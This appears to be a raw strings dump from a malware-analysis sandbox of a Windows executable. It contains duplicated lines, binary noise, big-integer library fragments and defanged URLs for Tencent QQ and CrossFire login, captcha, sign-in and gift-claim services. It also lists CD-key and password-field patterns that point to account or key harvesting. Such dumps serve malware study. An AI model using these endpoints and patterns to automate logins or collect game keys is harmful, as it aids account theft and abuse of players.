aG.subTo(aF, aG)
aG.drShiftTo(aM, aH);
aG.drShiftTo(aM, aH);
au.ZERO.subTo(aH, aH)
au.ZERO.subTo(aH, aH)
aG.clamp();
aG.clamp();
aG.rShiftTo(aP, aG)
aG.rShiftTo(aP, aG)
au.ZERO.subTo(aG, aG)
au.ZERO.subTo(aG, aG)
this.abs().divRemTo(t, null, z);
this.abs().divRemTo(t, null, z);
if (this.s 0) {
if (this.s 0) {
t.subTo(z, z)
t.subTo(z, z)
if (t.s = 0) {
if (t.s = 0) {
return t.mod(this.m)
return t.mod(this.m)
t.divRemTo(this.m, null, t)
t.divRemTo(this.m, null, t)
t.multiplyTo(aC, z);
t.multiplyTo(aC, z);
this.reduce(z)
this.reduce(z)
t.squareTo(z);
t.squareTo(z);
M.prototype.convert = X;
M.prototype.convert = X;
M.prototype.revert = am;
M.prototype.revert = am;
M.prototype.reduce = L;
M.prototype.reduce = L;
M.prototype.mulTo = J;
M.prototype.mulTo = J;
M.prototype.sqrTo = aw;
M.prototype.sqrTo = aw;
z = (z * (2 - t * z % this.DV)) % this.DV;
z = (z * (2 - t * z % this.DV)) % this.DV;
return (z > 0) ? this.DV - z: -z
return (z > 0) ? this.DV - z: -z
this.mp = t.invDigit();
this.mp = t.invDigit();
this.mpl = this.mp & 32767;
this.mpl = this.mp & 32767;
this.mph = this.mp >> 15;
this.mph = this.mp >> 15;
this.um = (1
this.um = (1
this.mt2 = 2 * t.t
this.mt2 = 2 * t.t
t.abs().dlShiftTo(this.m.t, z);
t.abs().dlShiftTo(this.m.t, z);
z.divRemTo(this.m, null, z);
z.divRemTo(this.m, null, z);
if (t.s 0) {
if (t.s 0) {
this.m.subTo(z, z)
this.m.subTo(z, z)
t.copyTo(z);
t.copyTo(z);
this.reduce(z);
this.reduce(z);
while (t.t
while (t.t
var aD = (z * this.mpl (((z * this.mph (t[aC] >> 15) * this.mpl) & this.um)
var aD = (z * this.mpl (((z * this.mph (t[aC] >> 15) * this.mpl) & this.um)
t[z] = this.m.am(0, aD, t, aC, 0, this.m.t);
t[z] = this.m.am(0, aD, t, aC, 0, this.m.t);
while (t[z] >= t.DV) {
while (t[z] >= t.DV) {
t[z] -= t.DV;
t[z] -= t.DV;
t.clamp();
t.clamp();
t.drShiftTo(this.m.t, t);
t.drShiftTo(this.m.t, t);
if (t.compareTo(this.m) >= 0) {
if (t.compareTo(this.m) >= 0) {
t.subTo(this.m, t)
t.subTo(this.m, t)
g.prototype.convert = al;
g.prototype.convert = al;
g.prototype.revert = av;
g.prototype.revert = av;
g.prototype.reduce = R;
g.prototype.reduce = R;
g.prototype.mulTo = B;
g.prototype.mulTo = B;
g.prototype.sqrTo = ao;
g.prototype.sqrTo = ao;
return au.ONE
return au.ONE
aF = aI.convert(this),
aF = aI.convert(this),
aF.copyTo(aG);
aF.copyTo(aG);
aI.sqrTo(aG, aC);
aI.sqrTo(aG, aC);
aI.mulTo(aC, aF, aG)
aI.mulTo(aC, aF, aG)
return aI.revert(aG)
return aI.revert(aG)
if (aC
if (aC
return this.exp(aC, aD)
return this.exp(aC, aD)
au.prototype.copyTo = aa;
au.prototype.copyTo = aa;
au.prototype.fromInt = p;
au.prototype.fromInt = p;
au.prototype.fromString = y;
%original file name%.exe_3308_rwx_00401000_004DC000:
.pQ\ a
.pQ\ a
.NaH-*
.NaH-*
!)!!))!)-*1-(333:73_
!)!!))!)-*1-(333:73_
%XE%Z
%XE%Z
dj%d~
dj%d~
.PXF3
.PXF3
02/24/16
02/24/16
%UD-Od
%UD-Od
lI*wt.KK
lI*wt.KK
%4u3\2t
%4u3\2t
W.ctn
W.ctn
.yEXjmS
.yEXjmS
Yn7%X
Yn7%X
..RZd
..RZd
A$#%DR
A$#%DR
Wx.xlu
Wx.xlu
n.mJ~f#
n.mJ~f#
Il%UVl_
Il%UVl_
.mDB`
.mDB`
.ijWU5
.ijWU5
w%SY
w%SY
Wkbn%X
Wkbn%X
kEYH
kEYH
&.kPd
&.kPd
(s.PKL
(s.PKL
>%fZM
>%fZM
T2%xE
T2%xE
dQ]%U
dQ]%U
#.mkTSx
#.mkTSx
.Ag.~
.Ag.~
%f%%f
%f%%f
7".Fv
7".Fv
>.OsM
>.OsM
r.vDO
r.vDO
pt_mbkey
pt_mbkey
[SKEY]
[SKEY]
"cdkey":"(.*?)"
"cdkey":"(.*?)"
[%d/d/d d:d]
[%d/d/d d:d]
\CF_CDKEY.ini
\CF_CDKEY.ini
hXXp://act.tgp.qq.com/index.php/
hXXp://act.tgp.qq.com/index.php/
Host: act.tgp.qq.com
Host: act.tgp.qq.com
X-Requested-With: XMLHttpRequest
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
Referer: hXXp://act.tgp.qq.com/cf/cf20160325/index.html?ADTAG=bangbang.hdsq
%7C
%7C
&user_checkparam=cf%7Cyes%7C
&user_checkparam=cf%7Cyes%7C
"msg":"
"msg":"
sMsg":"
sMsg":"
sMsg":"MODULE OK"
sMsg":"MODULE OK"
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=
hXXp://bang.qq.com/actcenter/queryFilterActList
hXXp://bang.qq.com/actcenter/queryFilterActList
"url":"(.*?)"
"url":"(.*?)"
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
hXXp://kf.qq.com/cgi-bin/common?rand=0.7021259550817557&command=command=C00006&fromtype=kfweb&fromtoolid=kfweb514&type=getCFSpend&area=
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
Referer:hXXp://kf.qq.com/game/consume_records.html?code=cf
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://apps.game.qq.com/cgi-bin/cf/userinfo/userinfo.cgi?ssn=
hXXp://VVV.baidu.com/
hXXp://VVV.baidu.com/
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/home.php?mod=task&do=apply&id=5
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/home.php?mod=spacecp&ac=credit&showcredit=1
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
hXXp://bbs.cf.qq.com/forum.php?mod=forumdisplay&fid=30503&page=6
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
&extra=&replysubmit=yes&infloat=yes&handlekey=fastpost&inajax=1
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=
hXXp://bbs.cf.qq.com/forum.php?mod=post&action=reply&fid=30503&tid=
&posttime=
&posttime=
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/home.php?mod=task&do=draw&id=5
hXXp://bbs.cf.qq.com/forum.php
hXXp://bbs.cf.qq.com/forum.php
&searchkey=15051408311873756101000000000000&from=1&question=å…Â费枪&vip=0&bangdou=1
&searchkey=15051408311873756101000000000000&from=1&question=å…Â费枪&vip=0&bangdou=1
%7C322%7C
%7C322%7C
*&checkparam=cf%7Cyes%7C
*&checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&ams_checkparam=cf%7Cyes%7C
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=&sServiceDepartment=xinyue&sServiceType=cf&sArea=
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
Referer:hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://bangbang.qq.com/php/robott3nologin/servey
hXXp://bangbang.qq.com/php/robott3nologin/servey
Referer:hXXp://bang.qq.com/actcenter/index/cf
Referer:hXXp://bang.qq.com/actcenter/index/cf
hXXp://bang.qq.com/ugc1/getActRecommend
hXXp://bang.qq.com/ugc1/getActRecommend
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
game=cf&mid=0&eid=5&surl=http://bangbang.qq.com/php/login?game=cf&durl=http://bang.qq.com/actcenter/index/cf?&ref=ingame01&ref=ingame01
hXXp://bang.qq.com/user/scorePersonalAcenter
hXXp://bang.qq.com/user/scorePersonalAcenter
Referer: hXXp://bang.qq.com/main/tradeinfo/
Referer: hXXp://bang.qq.com/main/tradeinfo/
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
game=bangbang&mid=9&eid=9000&surl=http://bang.qq.com/main/tradeinfo/&durl=http://bang.qq.com/main/tradeinfo/&world=0&serviceType=2&ref=
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/user/scorePersonal
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://bang.qq.com/comm-htdocs/js/ams/v0.2R02/ajaxcdr.swf
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=38135&sServiceDepartment=group_f
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc&sServiceType=dj
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=11117&sServiceDepartment=djc&set_info=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Fjudou2.0%2Fcf.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=11117&iFlowId=96910&g_tk=
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
Referer:hXXp://daoju.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.9721381550078127
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
hXXp://djcapp.game.qq.com/daoju/v3/api/app/e_app/add_jf_firstlogin.php?appSource=ios&appVersion=35&sDeviceID=&p_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fdaoju.qq.com%2Fmall%2Ftask.shtml&eas_refer=&sServiceDepartment=djc
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=dj&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=35644&iFlowId=204638&g_tk=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=dj&iActivityId=35644&sServiceDepartment=djc&set_info=djc
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=23314&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=52002&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=22249&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?actid=23074&g_tk_type=1&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=54963&callback=vipSignNew.signCb&g_tk=
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&eas_refer=http%3A%2F%2Fxinyue.qq.com%2Fweb201410%2Fwebgame.shtml&sServiceDepartment=xinyue&sServiceType=tgclub
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
Referer: hXXp://xinyue.qq.com/comm-htdocs/js/milo/ajaxcdr.swf?0.7271989360451698
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=21547&sServiceDepartment=xinyue&set_info=xinyue
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
hXXp://starvip.qq.com/fcg-bin/v2/fcg_mobile_starvip_site_checkin?g_tk=
&_=1454839692917
&_=1454839692917
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
hXXp://x.pet.qq.com/vip_platform?cmd=set_sign_info&timer=1454839703753&callback=jQuery110205429354978259653_1454839692914&token=
msg": "
msg": "
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
&pvsrc=102&s_p=0|http|&s_v=6.1.0.496&ozid=511022&vipid=&actid=68391&sid=&callback=json14530355412865&cache=3654
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
hXXp://iyouxi.vip.qq.com/ams3.0.php?g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
hXXp://proxy.vac.qq.com/cgi-bin/srfentry.fcgi?ts=1456988761581&g_tk=
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13D15 QQ/6.2.2.402 Pixel/640 NetType/WIFI Mem/86
&_=1452520903377
&_=1452520903377
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://pay.video.qq.com/fcgi-bin/sign?callback=jQuery111006800204519842937_1452520903238&low_login=1&uin=
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/card/bar_list_by_page
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://buluo.qq.com/cgi-bin/bar/user/sign
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
hXXp://qun.qzone.qq.com/cgi-bin/get_group_list?callbackFun=woaiwang&uin=
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Referer: hXXp://qiandao.qun.qq.com/cgi-bin/sign
Host: qiandao.qun.qq.com
Host: qiandao.qun.qq.com
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/sign
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://qiandao.qun.qq.com/cgi-bin/new_flag
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一æâ€Â¯Ã§Â©Â¿Ã¤Âºâ€˜Ã§Â®Â Ã¥ÂÆ’军万马æÂ¥ç›¸è§Â。
hXXp://c.pc.qq.com/fcgi-bin/signin?callback=jsonp1453084008086&_=1453084046097&mood_id=238&checkin_date=&remark=一æâ€Â¯Ã§Â©Â¿Ã¤Âºâ€˜Ã§Â®Â Ã¥ÂÆ’军万马æÂ¥ç›¸è§Â。
08 08 08 50
08 08 08 50
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/cfzs/help.html
hXXp://cfzhushou.com/help.html
hXXp://cfzhushou.com/help.html
hXXp://ip.qq.com/cgi-bin/myip
hXXp://ip.qq.com/cgi-bin/myip
hXXps://aq.qq.com/cn2/safe_service/device_lock
hXXps://aq.qq.com/cn2/safe_service/device_lock
aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
aid=21000124&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&noBorder=noborder&showtype=embed&uin=
hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499
hXXps://ssl.captcha.qq.com/cap_union_verify_new?random=1480258509499
&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
&pt_randsalt=0&u1=http://cf.qq.com&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-4-1457704626950&js_ver=10151&js_type=1&login_sig=&pt_uistyle=32&aid=21000124&daid=8&
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
hXXp://ossweb-img.qq.com/images/clientpop/act/cf/GpmHelpAct.js
http2://ossweb
http2://ossweb
hXXp://ossweb
hXXp://ossweb
"img":"http2(.*?).jpg"
"img":"http2(.*?).jpg"
"hXXp://(.*?)":{
"hXXp://(.*?)":{
"~ /1~!
"~ /1~!
fD.nn'1r?
fD.nn'1r?
.KM8'
.KM8'
$&%cw]
$&%cw]
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.com-
hXXp://leesin.zuhaowan.cn
hXXp://leesin.zuhaowan.cn
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://captcha.qq.com/getimage?aid=210001040.5721703316085041
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=41615&sServiceDepartment=group_f
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=qqgame&iActivityId=41615&sServiceDepartment=group_h&set_info=group_h
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
hXXp://webd.tgp.qq.com/cf/info_proxy/weapon_stat_info?&&zone_id=
1970.01.01 08:00:00
1970.01.01 08:00:00
function timea(){var d,s;d=new Date();d.setTime('
function timea(){var d,s;d=new Date();d.setTime('
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=55856&sServiceDepartment=group_f
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
hXXp://apps.game.qq.com/cf/a20160726hxb/getUserTask.php?action=getMyTaskList&iArea=
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
Referer:hXXp://cf.qq.com/act/a20160726hxb/index.htm
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
hXXp://apps.game.qq.com/daoju/appmarket/daoju_promotion/cloud_ticket/QueryCloudTicket.php?acctid=A100078&id=28&time=0.23177661886438727&_=1461381268102
"sMsg":"MODULE OK"
"sMsg":"MODULE OK"
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
&e_code=0&g_code=0&eas_url=http%3A%2F%2Fbang.qq.com%2Fshop%2Findex%2Fcf%2F&eas_refer=http%3A%2F%2Fbang.qq.com%2Fmain%2Ftradeinfo%2F&sServiceDepartment=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
hXXp://apps.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=tgclub&iActivityId=38135&sServiceDepartment=xinyue&set_info=xinyue
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
gameId=&sArea=&iSex=&sRoleId=&iGender=&sServiceType=tgclub&objCustomMsg=&areaname=&roleid=&rolelevel=&rolename=&areaid=&iActivityId=38135&iFlowId=214216&g_tk=
|322|
|322|
*&checkparam=cf|yes|
*&checkparam=cf|yes|
&ams_checkparam=cf|yes|
&ams_checkparam=cf|yes|
sCdKey=
sCdKey=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=8918&sServiceDepartment=x1m1
sMsg" : "
sMsg" : "
\gzip.dll
\gzip.dll
`.data
`.data
gzip.pdb
gzip.pdb
_u%SV
_u%SV
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E)
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://apps.game.qq.com/cgi-bin/cf/a20090409forceout/getinfo.cgi
hXXp://cfzhushou.com/pay.html
hXXp://cfzhushou.com/pay.html
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
hXXps://ssl.ptlogin2.qq.com/ptqrshow?appid=21000124&e=2&l=M&s=4&d=72&v=4&t=0.061519597441372864&daid=8
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
&js_ver=10151&js_type=1&login_sig=7qKho-IT4nBHQJBVoTYw6p-IGP0hieZLRsmCy5MWU7g0bRJNRkb5q8yH7BUA7cTM&pt_uistyle=20&aid=21000124&daid=8&
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
hXXps://ssl.ptlogin2.qq.com/ptqrlogin?ptredirect=1&u1=http://cf.qq.com/cp/a20160223czxlx/index.htm?e_code=213709&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=6-0-
game.qq.com
game.qq.com
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34
hXXps://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=21000124&s_url=hXXp://apps.game.qq.com&style=34
hXXp://cf.qq.com/cfvip/
hXXp://cf.qq.com/cfvip/
hXXp://xinyue.qq.com
hXXp://xinyue.qq.com
o%%co
o%%co
``PBi %c
``PBi %c
;ptlogin2
;ptlogin2
apps.game.qq.com
apps.game.qq.com
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
hXXp://login.game.qq.com/comm-cgi-bin/login/LoginReturnInfo.cgi?callback=jsonp21&game=cf
nickName":"
nickName":"
?kernel32.dll
?kernel32.dll
{56FDF344-FD6D-11d0-958A-006097C9A090}
{56FDF344-FD6D-11d0-958A-006097C9A090}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
{EA1AFB91-9E28-4B86-90E9-9E9F8A5EEFAF}
Report
Report
themepassword
themepassword
SysShadow.HostWnd
SysShadow.HostWnd
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
{6AEDBD6D-3FB5-418A-83A6-7F45229DC872}
VBScript.RegExp
VBScript.RegExp
1970-01-01 00:00:00
1970-01-01 00:00:00
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
background(?:-image)?:.*?[\s]*?url[\s]*?\([#
']?(.*?)[#
']?(.*?)[#
onkeydown|
onkeydown|
onkeyup|
onkeyup|
onkeypress|
onkeypress|
wA{0002DF05-0000-0000-C000-000000000046}
wA{0002DF05-0000-0000-C000-000000000046}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{D30C1661-CDAF-11D0-8A3E-00C04FC9E26E}
{6D5140C1-7436-11CE-8034-00AA006009FA}
{6D5140C1-7436-11CE-8034-00AA006009FA}
text|password|file
text|password|file
?)-D%f`
?)-D%f`
location.reload()
location.reload()
window.location.href="
window.location.href="
{25336920-03F9-11CF-8FD0-00AA00686F13}
{25336920-03F9-11CF-8FD0-00AA00686F13}
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
hXXp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
document.all.retjs.innerText=
document.all.retjs.innerText=
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='true';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.body.contentEditable='false';document.designMode='on';void 0;
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onsdragstart=document.onselectstart=document.oncontextmenu=function(){return true}
javascript:document.onselectstart = document.oncontextmenu = document.onmousedown = document.onkeydown = function(){return true;};
